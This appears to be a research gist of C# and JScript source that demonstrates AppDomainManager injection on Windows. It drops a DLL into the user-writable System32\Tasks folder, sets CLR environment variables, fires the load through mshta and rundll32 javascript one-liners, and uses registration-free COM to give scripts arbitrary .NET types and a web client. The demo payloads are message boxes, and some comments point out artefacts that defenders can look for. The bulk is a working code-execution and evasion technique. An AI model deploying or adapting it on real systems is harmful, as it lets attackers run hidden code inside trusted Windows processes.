Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype of DynamicWrapperX, but not posting that publicly
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
using System.Reflection; | |
using System.Reflection.Emit; | |
using System.Collections; | |
using System.Collections.Generic; | |
using System.Net; | |
/// <summary>
/// AppDomainManager that the runtime instantiates when the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE
/// environment variables named in the build notes below point at this assembly and type. Because it runs
/// before any application code, a process whose environment carries those two variables is the signal to look for.
/// </summary>
public sealed class MyAppDomainManager : AppDomainManager
{
    /// <summary>Invoked by the runtime for each new AppDomain; this demo only raises a visible message box.</summary>
    /// <param name="appDomainInfo">Setup information for the domain being created; not used here.</param>
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        // This hook also allows ApplicationBase to be set or the assembly resolver to be overridden;
        // the demo stops at a visible side effect.
        string banner = "AppDomain - KaBoom!";
        System.Windows.Forms.MessageBox.Show(banner);
    }
}
/* | |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:tasks.dll tasks.cs | |
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null | |
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager | |
set COMPLUS_Version=v4.0.30319 | |
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll | |
copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll | |
Simple One-Liner Triggers. | |
mshta.exe javascript:a=new%20ActiveXObject("System.Object");close(); | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";a=new%20ActiveXObject("System.Object");close(); | |
*/ | |
namespace MyDLL | |
{ | |
/// <summary>
/// COM-visible operations exposed to script hosts through the manifest's clrClass entry.
/// The Guid and ProgId below are the identifiers a manifest or script must name to reach this
/// class, which also makes them the strings to look for when reviewing what a host activated.
/// </summary>
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5ACDC")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("MyDLL.Operations")]
public class Operations
{
    /// <summary>Writes a marker to stdout so activation through COM is visible on the console.</summary>
    public Operations()
    {
        Console.WriteLine("So It Begins");
    }

    /// <summary>Maps a single-letter selector to a fixed description.</summary>
    /// <param name="sParameter">Selector; compared ordinally, so case matters.</param>
    /// <returns>
    /// "A was chosen", "B was chosen" or "C was chosen" for "a", "b" or "c"; "Other" for anything else, including null.
    /// </returns>
    [ComVisible(true)]
    public string getValue1(string sParameter)
    {
        // string.Equals tolerates a null selector, so null simply falls through to the default.
        if (string.Equals(sParameter, "a", StringComparison.Ordinal))
        {
            return "A was chosen";
        }
        if (string.Equals(sParameter, "b", StringComparison.Ordinal))
        {
            return "B was chosen";
        }
        if (string.Equals(sParameter, "c", StringComparison.Ordinal))
        {
            return "C was chosen";
        }
        return "Other";
    }

    /// <summary>Returns a fixed string; exists to show a value round-tripping to the scripting host.</summary>
    [ComVisible(true)]
    public string getValue2()
    {
        return "From VBS String Function";
    }

    /// <summary>Shows a message box: a visible side effect confirming the assembly executed in the host process.</summary>
    [ComVisible(true)]
    public void getValue3()
    {
        System.Windows.Forms.MessageBox.Show("Hey From My Assembly");
    }
}
/// <summary>
/// COM-visible helper that lets the scripting host reach arbitrary CLR types by name.
/// Each member widens what a script can do once the assembly is loaded, so the COM-visible
/// surface of this class is what a reviewer should scrutinise.
/// </summary>
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5DCAC")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("MyDLL.MyClassBuilder")]
public class MyClassBuilder
{
    /// <summary>Writes a marker to stdout when the class is activated.</summary>
    public MyClassBuilder()
    {
        Console.WriteLine("So It Begins, My ClassBuilder");
    }

    /// <summary>Instantiates a type, given its name, through its public parameterless constructor.</summary>
    /// <param name="inputString">Type name in the form accepted by <see cref="Type.GetType(string)"/>.</param>
    /// <returns>A new instance of the resolved type.</returns>
    /// <exception cref="ArgumentNullException">
    /// The name did not resolve: Type.GetType returns null for an unknown name and Activator.CreateInstance rejects it.
    /// </exception>
    /// <exception cref="MissingMethodException">The resolved type has no public parameterless constructor.</exception>
    public object Typer(string inputString)
    {
        // See https://stackoverflow.com/questions/11107536/convert-string-to-type-in-c-sharp
        Type resolved = Type.GetType(inputString);
        return Activator.CreateInstance(resolved);
    }

    /// <summary>Prints every public enum type from the assemblies currently loaded in this AppDomain.</summary>
    public void getTypes()
    {
        // Collect first and print second, so that if GetExportedTypes throws nothing has been printed yet.
        List<Type> enums = new List<Type>();
        foreach (Assembly loaded in AppDomain.CurrentDomain.GetAssemblies())
        {
            enums.AddRange(Array.FindAll(loaded.GetExportedTypes(), t => t.IsEnum));
        }
        enums.ForEach(e => Console.WriteLine(e.ToString()));
    }

    /// <summary>Hands the caller a fresh <see cref="WebClient"/>, i.e. an outbound HTTP client usable from script.</summary>
    /// <returns>A new WebClient with default settings.</returns>
    public System.Net.WebClient getWC()
    {
        // Same effect as Activator.CreateInstance(typeof(WebClient)): the public parameterless constructor.
        return new WebClient();
    }
}
} | |
// Windows Script Host (JScript) driver for tasks.dll. Each step below leaves something a defender can
// look for: process-scoped CLR environment variables, a manifest handed to Microsoft.Windows.ActCtx,
// and (per the comments further down) a managed assembly resolved from a System32 subfolder.
// var manifest string should be UTF-16
// Controls the search path for unmanaged dlls
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
// TMP is pointed at the folder the assembly was copied to (see the build notes in the C# file).
//new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Research\\Documents\\';
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\Windows\\System32\\Tasks';
// These two variables name the AppDomainManager the CLR will instantiate in this process. They are set
// before the first CLR object is created on the line below, which is what triggers the load.
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'MyAppDomainManager';
var o = new ActiveXObject("System.Object"); // Trigger AppDomainManager Load
// Ideally, we create a DLL, drop it anywhere and load it like DynamicWrapper...
// Loads Assembly, but expects it in the C:\Windows\System32 for example for managed code...
// Good news, CLR tries to resolve in sub dir with name of app.
// Since C:\Windows\system32\tasks is user writable... :) CLR finds and loads our assembly.
// Registration-free COM: the manifest declares clrClass, clsid and progid inline, so nothing is written
// to the registry. The ProgId strings and clsid GUIDs below are therefore the identifiers to search for.
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); //GUID {8fa7728f-b69b-4ee5-99f2-e2aa021bef28}
ax.ManifestText = manifest;
var dwx = ax.CreateObject("MyDLL.Operations");
dwx.getValue3() //Trigger Message Box
// Second activation context, this time for the class that exposes arbitrary CLR types to the script.
var manifest2 = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.MyClassBuilder" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5DCAD}" progid="MyDLL.MyClassBuilder" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';
var ax2 = new ActiveXObject("Microsoft.Windows.ActCtx"); //GUID {8fa7728f-b69b-4ee5-99f2-e2aa021bef28}
ax2.ManifestText = manifest2;
var dwx2 = ax2.CreateObject("MyDLL.MyClassBuilder");
//dwx2.getTypes();
// getWC returns a System.Net.WebClient to the script; the following DownloadString is the
// outbound HTTP request that shows the script now holds a full CLR object.
var wc = dwx2.getWC();
var s = wc.DownloadString("http://www.example.com");
WScript.StdOut.WriteLine(s);